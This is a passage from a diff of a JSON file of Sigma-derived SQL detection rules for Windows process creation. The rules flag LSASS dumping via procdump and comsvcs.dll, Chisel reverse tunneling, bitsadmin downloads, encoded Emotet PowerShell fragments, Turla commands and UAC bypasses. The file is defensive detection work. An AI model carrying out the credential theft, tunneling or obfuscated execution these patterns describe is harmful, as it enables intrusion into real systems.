an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", @@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ @@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": 